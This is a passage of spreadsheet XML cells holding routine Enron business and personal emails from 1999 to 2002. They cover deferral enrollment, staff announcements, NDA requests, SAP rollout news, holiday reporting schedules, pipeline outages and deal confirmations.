Good news!  Deferral program enrollment begins Wednesday, November 15, 2000=_x000D_
. =20_x000D_
 Enron's Bonus Stock Option and Bonus Phantom Stock Programs provide you wi=_x000D_
th=20_x000D_
an opportunity to receive stock options and phantom stock in lieu of all or=_x000D_
 a=20_x000D_
portion of the cash bonus you may receive during 2001.   To make enrollment=_x000D_
=20_x000D_
even more convenient for you, this year's deferral program information is=_x000D_
=20_x000D_
available on eHRonline. =20_x000D_
_x000D_
To learn more about your deferral program opportunities and to enroll for=_x000D_
=20_x000D_
2001 deferrals, access eHRonline at http://ehronline.enron.com.  (Call the=_x000D_
=20_x000D_
ISC Help Desk at 713-345-4727 if you need your ID or password to access the=_x000D_
=20_x000D_
system.)_x000D_
_x000D_
1. Review the program descriptions (attached to the Election Form) before y=_x000D_
ou=20_x000D_
make your elections._x000D_
2. If you decide to defer compensation, complete the Election Form before=_x000D_
=20_x000D_
Friday, December 8,  2000 (the enrollment deadline)._x000D_
3. Print your 2001 Election Form and Confirmation Statement right from the=_x000D_
=20_x000D_
web site and you=01,re   finished!=20_x000D_
_x000D_
Sound easy?  It is!_x000D_
_x000D_
DEFERRAL ENROLLMENT 2001--ADDED VALUE FOR YOUR FUTURE</t>
  </si>
  <si>
    <t>Tue, 15 May 2001 15:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve"> Organization Announcement (Correction) _x000D_
_x000D_
I apologize for the confusion and inconvenience my mistake caused.  I had _x000D_
indicated that Kenneth Lovejoy would be supporting EES, but this is not _x000D_
correct.  Ken will be supporting  OEC.  Corrected announcement is provided _x000D_
below. _x000D_
_x000D_
 It is my pleasure to announce that Kenneth Lovejoy has joined Enron Corp. _x000D_
EH&amp;S Asset Operations.  He will be reporting directly to Donnie Willmann and  _x000D_
will support Central America, Caribbean and OEC.  Ken has over 25 year _x000D_
experience in environmental, health and safety for the oil and gas _x000D_
industry.   He has been working for Enron since 1996 and has extensive _x000D_
international experience.    We are excited to have Ken in our team so, _x000D_
please welcome Ken in his new role._x000D_
_x000D_
Henry  Van</t>
  </si>
  <si>
    <t>Mon, 9 Apr 2001 07:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kcompton@kpcb.com', 'darnoff@greylock.com', 'johnt@austinventures.com'})</t>
  </si>
  <si>
    <t>April 24 YPO presentation in Houston</t>
  </si>
  <si>
    <t>Gentlemen,_x000D_
_x000D_
I'm writing on behalf of Jeff Skilling regarding scheduling a 20-minute _x000D_
conference call to discuss the above referenced presentation/panel discussion _x000D_
at the Houston Chapter YPO (Young Presidents Organization) meeting.  Jeff is _x000D_
available the afternoon of Thursday, April 12, between the hours of 3:00 p.m. _x000D_
and 5:00 p.m. (CDT).  Please let me know what your availability is during _x000D_
this time period, and I'll be back in touch to nail down an exact time or to _x000D_
suggest an alternative date/time._x000D_
_x000D_
Thank you very much for your commitment to this event and for your patience _x000D_
in awaiting the details.  I look forward to hearing from each of you soon._x000D_
_x000D_
Best regards,_x000D_
Sherri Sera_x000D_
Assistant to Jeff Skilling_x000D_
713.853.5984_x000D_
713.646.8381 (fax)_x000D_
sherri.sera@enron.com_x000D_
_x000D_
Sent to:_x000D_
David Arnoff, Greylock_x000D_
Kevin Compton, KPCB Team Partners_x000D_
John Thornton, Austin Ventures</t>
  </si>
  <si>
    <t>Tue, 15 Aug 2000 07:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: SWAP Group - Calendar</t>
  </si>
  <si>
    <t xml:space="preserve">Please add the ENA offsite Oct. 5 &amp; 6.  </t>
  </si>
  <si>
    <t>Wed, 21 Feb 2001 03:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'paul.finken@enron.com'})</t>
  </si>
  <si>
    <t>NDA's</t>
  </si>
  <si>
    <t xml:space="preserve">Tana,_x000D_
_x000D_
I need three NDA's drafted and I would like to see at least one of them _x000D_
before being sent. _x000D_
_x000D_
Monterey Designs Systems, Inc._x000D_
894 Ross Drive, Suite 100_x000D_
Sunnyvale, CA 94089-1443_x000D_
Phone: 408 548 4681_x000D_
Fax: 408 747 7377_x000D_
Signer: Bill Alexander_x000D_
VP Marketing_x000D_
email:bill@mondes.com_x000D_
_x000D_
Softknot Corporation_x000D_
46500 Fremont Blvd, Ste 716_x000D_
Fremont, California 94538_x000D_
Signer: Mo Mohaved, CEO &amp; Founder_x000D_
Phone:510 226 3750_x000D_
Fax:510 226 2776_x000D_
email:mmovahed@softknot.com_x000D_
_x000D_
GreenAsh Corporation_x000D_
38 Watermill_x000D_
Sugarland, TX 77479_x000D_
Signer: Vinh Nguyen, CEO &amp; Founder_x000D_
Phone 281 989 9823_x000D_
Fax: 419 831 0787 _x000D_
email:vnguyen@greenash.com_x000D_
_x000D_
thanks_x000D_
_x000D_
pf_x000D_
</t>
  </si>
  <si>
    <t>Mon, 6 Nov 2000 01:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'caron.horton@trinity.edu'})</t>
  </si>
  <si>
    <t>Re: sorry</t>
  </si>
  <si>
    <t>Apology accepted.  My feelings were hurt considering laning you the BMW, _x000D_
paying for dinner and washing and filling your car with gas!!_x000D_
_x000D_
Love,  Dad</t>
  </si>
  <si>
    <t>Wed, 27 Feb 2002 14:21:39 -0800 (PST)</t>
  </si>
  <si>
    <t>conf call w/ PWE to discuss latest proposal</t>
  </si>
  <si>
    <t xml:space="preserve">When: Thursday, February 28, 2002 3:30 PM-4:30 PM (GMT-06:00) Central Time (US &amp; Canada)._x000D_
Where: Hyatt's ofc_x000D_
_x000D_
*~*~*~*~*~*~*~*~*~*_x000D_
</t>
  </si>
  <si>
    <t>Thu, 13 Apr 2000 11:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>EBS goes live! . . . 15,000 will be impacted on 7/1/00</t>
  </si>
  <si>
    <t>Enron Broadband Services is the latest addition to the Enron SAP rollout.  _x000D_
The Apollo and Beyond project team and Enron's business units are currently _x000D_
preparing for the project's final implementation.  Apollo and Beyond is an _x000D_
Enron initiative tasked with laying a common financial, human resources, _x000D_
project management, and procurement foundation throughout the majority of _x000D_
Enron's businesses._x000D_
_x000D_
EBS "Go-Live"_x000D_
_x000D_
On April 1st, Enron Broadband Services supplemented their current SAP _x000D_
functionality with HR Online and SAP HR, including payroll and organizational _x000D_
structure management.  HR Online enables the EBS population to enter their _x000D_
own time, view and update their personal information, and view their vacation _x000D_
time and individual payroll information via Enron's intranet._x000D_
_x000D_
Additionally, this implementation enhanced the SAP Financial, Project and _x000D_
Procurement processes that EBS has had in operation since April 1, 1999.  _x000D_
These enhancements included an EBS pilot of B2B, a web-based requisitioning _x000D_
tool. Among the benefits of these enhancements will be improved information _x000D_
flow across business units currently on SAP._x000D_
_x000D_
July 1 "Go-Live"_x000D_
_x000D_
This final Apollo and Beyond implementation will directly impact more than _x000D_
15,000 Enron employees and contractors -- odds are that you are one of them!  _x000D_
People impacted on July 1st include:_x000D_
_x000D_
all Enron employees paid out of Corporate Payroll in Houston, excluding _x000D_
Azurix employees_x000D_
the financial communities of Enron Energy Services, Enron Investment _x000D_
Partners, Enron North America, Enron Renewable Energy Corporation, Gas _x000D_
Pipeline Group, Global Finance, and Global Products._x000D_
the project management communities of Enron North America, Gas Pipeline _x000D_
Group, Global Asset Operations, Global Finance, and Global Products._x000D_
the human resources communities of Corporate, Global E&amp;P, Enron Energy _x000D_
Services, Enron Engineering and Construction Company, Enron Investment _x000D_
Partners, Enron North America, Enron Renewable Energy Corporation (Houston _x000D_
only), the international regions, Gas Pipeline Group, Global Finance, and _x000D_
Global Products._x000D_
_x000D_
General SAP training will be available in late April via the Enron intranet.  _x000D_
Additional, specific, SAP classes and workshops are scheduled to begin in May _x000D_
and continue through August.  Information on the project can be obtained _x000D_
through the Enron intranet at http://sap.enron.com and by contacting Business _x000D_
Unit representatives currently working with the project.  A list of Business _x000D_
Unit representatives is located on the intranet site._x000D_
_x000D_
Additional information related to the July 1st implementation will be _x000D_
communicated to you over the next few months._x000D_
_x000D_
Thank you._x000D_
_x000D_
Melissa Becker_x000D_
Project Leader, Apollo and Beyond</t>
  </si>
  <si>
    <t>Tue, 21 Aug 2001 15:37:03 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Traders for Can Gas Phy basis Firm West</t>
  </si>
  <si>
    <t>Melba,_x000D_
_x000D_
Chris Lambie, Chris Dorland, Mike Cowan, and Chad Clark will be managing products.  All Canadian traders will need transaction capabilities.  I do not think that any "view only" access will be needed._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Jon_x000D_
_x000D_
_x000D_
PS. I am moving to Houston permanently tomorrow and will have to pass this responsibility off to Chris Lambie._x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lozano, Melba  _x000D_
Sent:	Tuesday, August 21, 2001 12:45 PM_x000D_
To:	Lambie, Chris_x000D_
Cc:	Mckay, Jonathan; Sever, Stephanie; Meredith, Kevin; Walker, Chris_x000D_
Subject:	Traders for Can Gas Phy basis Firm West_x000D_
_x000D_
Please let me know who will be managing the new basis west product types.  Also which trader will need read only access. _x000D_
_x000D_
Thank you,_x000D_
_x000D_
Melba</t>
  </si>
  <si>
    <t>Tue, 21 Dec 1999 02:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bob.shults@enron.com', 'robert.superty@enron.com', 'ted.murphy@enron.com', 'jeffrey.shankman@enron.com', 'thomas.gros@enron.com', 'brent.price@enron.com', 'mary.solmonson@enron.com', 'john.lavorato@enron.com', 'philippe.bibi@enron.com', 'tim.belden@enron.com', 'peggy.hedstrom@enron.com', 'd.hall@enron.com', 'michael.moscoso@enron.com', 'stephen.schwarz@enron.com', 'sheila.glover@enron.com', 'kristin.albrecht@enron.com', 'leslie.reeves@enron.com', 'richard.causey@enron.com', 'brenda.herod@enron.com', 'scott.pleus@enron.com'})</t>
  </si>
  <si>
    <t>Holiday Coverage Contact-REVISED</t>
  </si>
  <si>
    <t>Please note change in red on Key Contact List for week of December 27, 1999=_x000D_
._x000D_
Attached please find a Key Contact list for Energy Operations for the weeks=_x000D_
=20_x000D_
of December 20 and December 27, 1999.  Note the following schedule for risk=_x000D_
=20_x000D_
book reporting to accommodate the holidays.=20_x000D_
_x000D_
_x000D_
Trade Date  Enron Status NYMEX  Equity Market  Consolidated Risk Reporting=_x000D_
=20_x000D_
_x000D_
Thursday, 12/23 Holiday  Open Open DPR published =01) normal schedule **_x000D_
_x000D_
Friday, 12/24 Holiday Closed Closed DPR not published  **_x000D_
_x000D_
Monday, 12/27 Open * Open Open DPR includes 12/24 &amp; 12/27 P&amp;L_x000D_
_x000D_
Tuesday, 12/28 Open * Open Open DPR published =01) normal schedule_x000D_
_x000D_
Wednesday, 12/29 Open  Open Open DPR published =01) normal schedule =20_x000D_
Thursday, 12/30 Open Open Open DPR published =01) normal month-end_x000D_
    schedule_x000D_
_x000D_
Friday, 12/31 Holiday Closed Open DPR not published  **_x000D_
   (closed 1PM EST)_x000D_
_x000D_
Monday, 1/3 Holiday Closed Open DPR not published  **_x000D_
_x000D_
Tuesday, 1/4 Open Open Open  DPR includes 12/31, 1/3 &amp; 1/4 =20_x000D_
_x000D_
Notes:    *  Canadian holiday_x000D_
  **  Trader P&amp;L and Position reports will be produces for traded products =_x000D_
=20_x000D_
_x000D_
_x000D_
_x000D_
Distribution:=20_x000D_
ENA Office of the Chairman Commercial Pulp &amp; Paper  Energy Operations_x000D_
Cliff Baxter  Greg Whalley Edward Ondarza  Kristin Albrecht_x000D_
Kevin Hannon    Sheila Glover_x000D_
 Natural Gas Financial Products  Todd Hall_x000D_
ENA - Other Jeff Shankman Gary Hickerson  Peggy Hedstrom_x000D_
Philippe Bibi John Arnold   Brenda Herod_x000D_
Wanda Curry  Tom Martin Merchant Portfolio  Mike Moscoso=20_x000D_
Jordan Mintz Scott Neal Andrea Reed   Scott Pleus_x000D_
 Bob Shiring   Brent Price_x000D_
Enron Canada Hunter Shively  Weather  Leslie Reeves_x000D_
John Lavorato  Linda Clemmons  Stephen Schwarz=20_x000D_
 Power   Bob Shults_x000D_
Enron Corp. Jim Fallon Bandwidth  Mary Solmonson_x000D_
Rick Causey Tim Belden Tom Gros  Bob Superty_x000D_
Ted Murphy_x000D_
=20_x000D_
=09_x000D_
=09_x000D_
=09</t>
  </si>
  <si>
    <t>Fri, 24 Mar 2000 06:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rosario.carbone@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'frank.sayre@enron.com', 'james.mcginnis@msdw.com', 'diomedes.christodoulou@enron.com', 'randy.young@enron.com', 'bruce.harris@enron.com', 'glenn.matthys@enron.com', 'alastair.maxwell@msdw.com', 'ceci.torn@enron.com', 'mmetts@enron.com', 'wjoor@velaw.com', 'edward.graham@enron.com', 'michael.miller@enron.com', 'jlamaster@velaw.com', 'frank.stabler@enron.com', 'mitchell.taylor@enron.com', 'david.haug@enron.com', 'steven.kean@enron.com', 'rob.walls@enron.com'})</t>
  </si>
  <si>
    <t>PROJECT CALIFORNIA DAILY CONFERENCE CALL</t>
  </si>
  <si>
    <t>There will be a daily conference call on "Project California".  This will _x000D_
keep everyone informed and coordinated on activities.  This conference call _x000D_
has been  scheduled for Monday  through Friday, March 27 through March 31.  _x000D_
The time will remain the same 10am Houston time, (4:00pm London time)._x000D_
_x000D_
The call in numbers are as follows:_x000D_
_x000D_
Domestic Line: 1-877-233-7852_x000D_
International Line: 1-505-766-5463_x000D_
Participant Code: 986034_x000D_
Host Code:  752195 (For Mitchell Taylor)_x000D_
_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Rosario_x000D_
6-6253</t>
  </si>
  <si>
    <t>Tue, 1 May 2001 06:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Fw: Only a woman could appreciate this one!!!</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Andrea Ring/HOU/ECT on 05/01/2001 01:58 _x000D_
PM ---------------------------_x000D_
From: Michele Winckowski/ENRON@enronXgate on 04/23/2001 09:28 AM_x000D_
To: "Bob Gerrish (E-mail)" &lt;robary@cs.com&gt;@SMTP@enronXgate, Andrea _x000D_
Ring/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: FW: Fw: Only a woman could appreciate this one!!!_x000D_
_x000D_
_x000D_
_x000D_
 - MAMMO.jpg_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 7 Aug 2000 11:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kay.mann@enron.com', 'kathleen.clark@enron.com'})</t>
  </si>
  <si>
    <t>Re: LM6K Change Order #2 Revised</t>
  </si>
  <si>
    <t xml:space="preserve">Kay and Kathy:_x000D_
_x000D_
Please make the effective date of the change order the date of execution. I _x000D_
have separately followed up on Lisa's DASH question, and we should be in a _x000D_
position to execute the change order after this is clarified._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Ben_x000D_
---------------------- Forwarded by Ben Jacoby/HOU/ECT on 08/07/2000 04:38 PM _x000D_
---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Lisa Bills @ ENRON                           08/07/2000 06:09 PM_x000D_
	_x000D_
_x000D_
To: Ben F Jacoby/HOU/ECT@ECT_x000D_
cc: Herman Manis/Corp/Enron@ENRON, Kay Mann/Corp/Enron@Enron, Chip _x000D_
Schneider/NA/Enron@Enron, Jody Pierce/HOU/ECT@ECT _x000D_
Subject: Re: LM6K Change Order #2 Revised  _x000D_
_x000D_
Here are my comments after reviewing the below change order: (i) the cover _x000D_
page refers to an enron 2-99 deal which does not correspond to the cover page _x000D_
of the executed turbine purchase contract with GE.  To what does this refer _x000D_
if a different deal and if the same deal, please conform.  (ii) the effective _x000D_
date is stated as March 6, 2000.  Given that the agreement between Enron and _x000D_
WestLB and the purchase agreement between WestLB and GE weren't signed until _x000D_
May 12, 2000, if any backdating is needed (I'd like to understand why it is _x000D_
for new equipment orders), it can't be before May 12th.  With respect to the _x000D_
effective date and the overall placement of the order, has this $4.65MM _x000D_
acquisition been dashed?  The current effective dash only contemplated the _x000D_
turbines, not any ancillary equipment.  I believe Chip Schneider is the RAC _x000D_
contact for this transaction._x000D_
_x000D_
Regards, Lisa_x000D_
_x000D_
_x000D_
_x000D_
Ben F Jacoby@ECT_x000D_
08/07/2000 10:32 AM_x000D_
Sent by: Ben Jacoby@ECT_x000D_
To: Lisa Bills/Corp/Enron@ENRON, Herman Manis/Corp/Enron@ENRON_x000D_
cc: Kay Mann/Corp/Enron@Enron _x000D_
_x000D_
Subject: LM6K Change Order #2 Revised_x000D_
_x000D_
Lisa and Herman:_x000D_
_x000D_
Please review the attached change order. We would like to have your comments _x000D_
back, if any, in the next couple of days so we can execute the contract by _x000D_
Friday. Let me know if you have any questions._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Ben_x000D_
---------------------- Forwarded by Ben Jacoby/HOU/ECT on 08/07/2000 08:43 AM _x000D_
---------------------------_x000D_
From: Kathleen Clark@ENRON_DEVELOPMENT on 08/07/2000 09:31 AM_x000D_
To: Chris Booth/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Ben Jacoby/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: LM6K Change Order #2 Revised_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Kathleen Clark/ENRON_DEVELOPMENT on _x000D_
08/07/2000 09:30 AM ---------------------------_x000D_
   _x000D_
	Enron Engineering &amp; Construction Company_x000D_
	From:  Kathleen Clark                           08/07/2000 09:28 AM_x000D_
	_x000D_
_x000D_
To: Kay Mann/Corp/Enron@ENRON, Scott Dieball/ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
_x000D_
Subject: LM6K Change Order #2 Revised_x000D_
_x000D_
Kay &amp; Scott:_x000D_
_x000D_
Attached is a revised draft of Change Order #2 for your review.  _x000D_
_x000D_
Since the draft of 7/20/00, we have added two additional exhaust stacks at _x000D_
$233,000/Unit._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kathy_x000D_
x56400_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 16 Oct 2001 14:31:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tcooper@ngfc.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
-- Just checking to make sure you were still alive!!!  How are you _x000D_
doing?  Are you free for lunch anytime soon?_x000D_
NGFC, tcooper@ngfc.com on 16/10/2001_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 11 Aug 2000 06:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">this is funny_x000D_
---------------------- Forwarded by Matthew Lenhart/HOU/ECT on 08/11/2000 _x000D_
01:51 PM ---------------------------_x000D_
To: Michael Walters/HOU/ECT@ECT, Harry Bucalo/HOU/ECT@ECT, O'Neal D _x000D_
Winfree/HOU/ECT@ECT, Phillip M Love/HOU/ECT@ECT, Eric Bass/HOU/ECT@ECT, _x000D_
Matthew Lenhart/HOU/ECT@ECT, Timothy Blanchard/HOU/EES@EES, Chad _x000D_
Landry/HOU/ECT@ECT, Yvette G Connevey/Corp/Enron@ENRON, David _x000D_
Baumbach/HOU/ECT@ECT, Jody Crook/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: cop shock_x000D_
_x000D_
_x000D_
 - FingerPig.avi_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 14 Dec 2000 09:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ben.f.jacoby@enron.com'})</t>
  </si>
  <si>
    <t>Turbine / Transformer Prototype Documents</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;&lt;2RZ501!.DOC&gt;&gt;  &lt;&lt;2R6LRED.DOC&gt;&gt;  &lt;&lt;2RZ601!.DOC&gt;&gt;  &lt;&lt;2RLSRED.DOC&gt;&gt;_x000D_
&lt;&lt;2RZ5RED.DOC&gt;&gt;  &lt;&lt;2RZ801!.DOC&gt;&gt;  &lt;&lt;2RSWRED.DOC&gt;&gt;_x000D_
_x000D_
We have enclosed initial drafts of the following documents:_x000D_
_x000D_
 1. Letter Agreement for the Turbine Transaction (clean copy and_x000D_
blacklined copy marked to reflect revisions from the current draft of the_x000D_
turbine letter agreement with Coral);_x000D_
_x000D_
 2. Letter Agreement for the Transformer Transaction (clean_x000D_
copy, blacklined copy marked to reflect revisions from the current draft of_x000D_
the transformer letter agreement with Coral, and blacklined copy marked to_x000D_
reflect revisions from the turbine letter agreement referenced as item no. 1_x000D_
above);_x000D_
_x000D_
 3. Limited Liability Company Agreement (clean copy and_x000D_
blacklined copy marked to reflect revisions from the current draft of the_x000D_
LLC agreement for CA/ED-II)._x000D_
_x000D_
As mentioned on the telephone, I have retained a number of the_x000D_
representations and warranties requested by Coral, with modifications where_x000D_
necessary to eliminate those aspects which were objectionable to Enron.  The_x000D_
justification for this is that nearly any purchaser would insist on such_x000D_
representations, and it is often more advantageous to present a draft that_x000D_
appears to be neutral, rather than allow the counterparty to focus on what_x000D_
is not there and then have the advantage of drafting precisely what it_x000D_
wants.  Therefore, we suggest that Enron carefully review the_x000D_
representations and warranties in order that any objectionable items can be_x000D_
eliminated before circulation of documents to the counterparty.  Because we_x000D_
rearranged and reorganized the representations and warranties to make a more_x000D_
clear presentation, the blacklined drafts will not be very helpful fur_x000D_
purposes of reviewing representations and warranties._x000D_
_x000D_
Please review the enclosed at your convenience and advise of any comments._x000D_
Thank you._x000D_
_x000D_
Carolyn M. Campbell_x000D_
King &amp; Spalding_x000D_
713-276-73-7 (phone)_x000D_
713-751-3280 (fax)_x000D_
ccampbell@kslaw.com &lt;mailto:ccampbell@kslaw.com&gt;_x000D_
_x000D_
Enclosures: 129569v1_x000D_
  129569v1 from 128541v14_x000D_
  129570v1_x000D_
  129570v1 from 129088v6_x000D_
  129570v1 from 129569v1_x000D_
  129572v1_x000D_
  129572v1 from 129344v1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RZ501!.DOC_x000D_
 - 2R6LRED.DOC_x000D_
 - 2RZ601!.DOC_x000D_
 - 2RLSRED.DOC_x000D_
 - 2RZ5RED.DOC_x000D_
 - 2RZ801!.DOC_x000D_
 - 2RSWRED.DOC</t>
  </si>
  <si>
    <t>Fri, 21 Sep 2001 17:24:24 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'vjw@cleanpower.org', 'kip.lipper@sen.ca.gov'})</t>
  </si>
  <si>
    <t>FW: CSFB on the PG&amp;E POR</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
   FYI. _x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Wed, 12 Sep 2001 16:24:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW:  Outage Coordination Commercial Review (NNG &amp; TW)</t>
  </si>
  <si>
    <t xml:space="preserve">Mark, FYI on the outage meeting Thursday._x000D_
_x000D_
Kim._x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Graves, Jerry =20_x000D_
Sent:=09Wednesday, September 12, 2001 5:46 PM_x000D_
To:=09Graves, Jerry; Alexander, James C.; Blair, Lynn; Bonnstetter, Mike; B=_x000D_
oothe, David; Boston, Jerry; Brown, Sharon; Bryant, Mike; Buchanan, John; B=_x000D_
urns, Christopher; Clark, Scott; Cordes, Bill; Corless, Gary; Corman, Shell=_x000D_
ey; Geaccone, Tracy; Gilbert, Tom; Good, Chuck; Gottsponer, Morgan; Graham,=_x000D_
 Charlie; Harris, Steven; Hood, Colleen; Howard, Randy; January, Steven; Jo=_x000D_
lly, Rich; Jordan, Fred; Keller, John R.; Kowalke, Terry; Kudym, Judy; Kueh=_x000D_
l, Toby; Lawrence, James; LeBeau, Randy; Lowry, Phil; Maestas, Gary; Mall, =_x000D_
Greg; Martens, Donna; McGillivray, RR; Mertz, Tom; Moore, Jan; Morse, Ronni=_x000D_
e; Nelson, Mike; Neubauer, Dave; Odneal, Dave; Rice, Randy; Roensch, David;=_x000D_
 Schoolcraft, Darrell; Schroeder, Jim; Smith, Rick; Spraggins, Gary; Stephe=_x000D_
ns, LD; Swett, Larry; Thomas, Steve; Watson, Kimberly; Williams, Jo; Willia=_x000D_
ms, Walt; Abdmoulaie, Mansoor; Alters, Dennis; Dushinske, Adam; Faucheaux, =_x000D_
Eric; Frazier, Perry; Gilbert, Maurice; Hughes, Matt; Matthews, Ron; Ramsar=_x000D_
an, Gale; Smith, Buzz; Anderson, Ken; Aschwege, Doug; Beck, Judy; Descoteau=_x000D_
x, Carolyn; Dobbins, Dan; Johnson, Robert L.; Kolarik, David; Reinecke, Bry=_x000D_
an; Sans Souci, Becki; Westfall, Roger; Asante, Ben; Choquette, Gary; Kouri=_x000D_
, Kim; McChane, Bob; Sturn, John; Wirasinghe, Errol_x000D_
Subject:=09 Outage Coordination Commercial Review (NNG &amp; TW)_x000D_
_x000D_
_x000D_
FYI,_x000D_
_x000D_
Please take note of the date change.=20_x000D_
_x000D_
The next Outage Coordination Commercial Review meeting is 09/13/01.  The pu=_x000D_
rpose for the meeting is to discuss outages that have a flow impact with th=_x000D_
e Commercial groups. If you have any questions or concerns, please give me =_x000D_
a call. =20_x000D_
_x000D_
_x000D_
Jerry Graves=20_x000D_
713-345-8923_x000D_
_x000D_
_x000D_
When: Sept. 13_x000D_
Time: 1:00 to 2:00_x000D_
Where: Houston 49C2_x000D_
             Omaha  VCR - 7th floor_x000D_
             Field Personnel - Conference # 877-795-3687 =20_x000D_
                                         Code # 755555_x000D_
_x000D_
                                                                           =_x000D_
                                  =20_x000D_
Northern Border Pipeline_x000D_
 Location=09Date  =09Scope =09Comments=09_x000D_
=09=09=09=09_x000D_
CS08=0909/16/01 to 09/16/01=09MP2, and replace thermocouple. (10 hrs)=09Pot=_x000D_
ential impact is low.=09_x000D_
CS04=0909/13/01 to 09/13/01=09Scope, MP2, Emissions testing. (10 hrs)=09Pot=_x000D_
ential impact is low.=09_x000D_
CS07=0909/18/01 to 09/18/01=09Scope, Wash, MP2, and replace Argotech pump. =_x000D_
(10 hrs)=09Potential impact is low.=09_x000D_
CS09=0909/25/01 to 09/25/01=09Scope, MP2, Clean oil coolers. (10 hrs)=09Pot=_x000D_
ential impact is low.=09_x000D_
CS10=0909/27/01 to 09/27/01=09Scope, Wash, MP2,  and replace their inlet ai=_x000D_
r pre-filters. (10 hrs)=09Potential impact is low.=09_x000D_
CS12=0910/04/01 to 10/04/01=09Scope, Wash, MP2,  and valve mods. (10 hrs)=_x000D_
=09Potential impact is low.=09_x000D_
CS03=0910/16/01 to 10/16/01=09 Wash, MP2, and replace their inlet air filte=_x000D_
rs. (10 hrs)=09Potential impact is low.=09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hu, 8 Feb 2001 00:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Conoco deals</t>
  </si>
  <si>
    <t xml:space="preserve">I spoke with Sean Crandall, who told me that from his standpoint the deals _x000D_
ARE separate; however, John Malowney is the mid-marketer who works with _x000D_
Conoco, and he told me that this special language is fine to include in the _x000D_
confirmations for these deals. Turns out I was just asking the wrong person. _x000D_
_x000D_
Let me know if you need comments added in these deals._x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
_x000D_
_x000D_
Stephanie Piwetz   02/08/2001 08:20 AM_x000D_
_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Conoco deals_x000D_
_x000D_
Kate, please ask Sean Crandell if the following deals need the "special _x000D_
phrase" ..The Parties agree and acknowledge that this Transaction is _x000D_
connected with the transaction referenced in Deal No. 347356.1 entered into _x000D_
between the Parties on May 31, 2001._x000D_
_x000D_
Jack Wells of Conoco called and said that the phrase should be included in _x000D_
confirmations: 506549.01..506550.01..506551.01 and 507417.01 and 507430.01.  _x000D_
Please ask trader if deals are related to the 347356.01.  Sharen has inquired _x000D_
once before and we were under the impression that the deals were separate and _x000D_
not included.  Please let us know._x000D_
_x000D_
Thanks_x000D_
Stephanie _x000D_
---------------------- Forwarded by Stephanie Piwetz/HOU/ECT on 02/08/2001 _x000D_
10:12 AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Sharen Cason                           02/08/2001 10:07 AM_x000D_
	_x000D_
_x000D_
To: Stephanie Piwetz/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Conoco deals_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Sharen Cason/HOU/ECT on 02/08/2001 10:06 _x000D_
AM ---------------------------_x000D_
   Kate Symes                01/29/2001 06:22 PM_x000D_
_x000D_
To: Sharen Cason/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Deal 507430 and 507417  _x000D_
_x000D_
Jack Wells is the contact for both - I've added his name to deal #507417. _x000D_
According to Sean Crandall, these deals are separate from 347356. That deal _x000D_
was a sale, and the deals entered today are all buys. Sean said we're just _x000D_
buying back the MW we originally sold them. But I think that's the only _x000D_
connection. Let me know if you need more of an explanation from the traders, _x000D_
but our take is that these deals are separate._x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Sharen Cason                           01/29/2001 04:05 PM_x000D_
	_x000D_
_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Deal 507430 and 507417_x000D_
_x000D_
Are these two deals part of the original Conoco deal # 347356 that they are _x000D_
extending or something different?  We need to know because we have to add _x000D_
something in the confirmation if they are extensions of the original deal.  _x000D_
Also, is Jack Wells the contact for both?_x000D_
_x000D_
Thanks!_x000D_
_x000D_
_x000D_
_x000D_
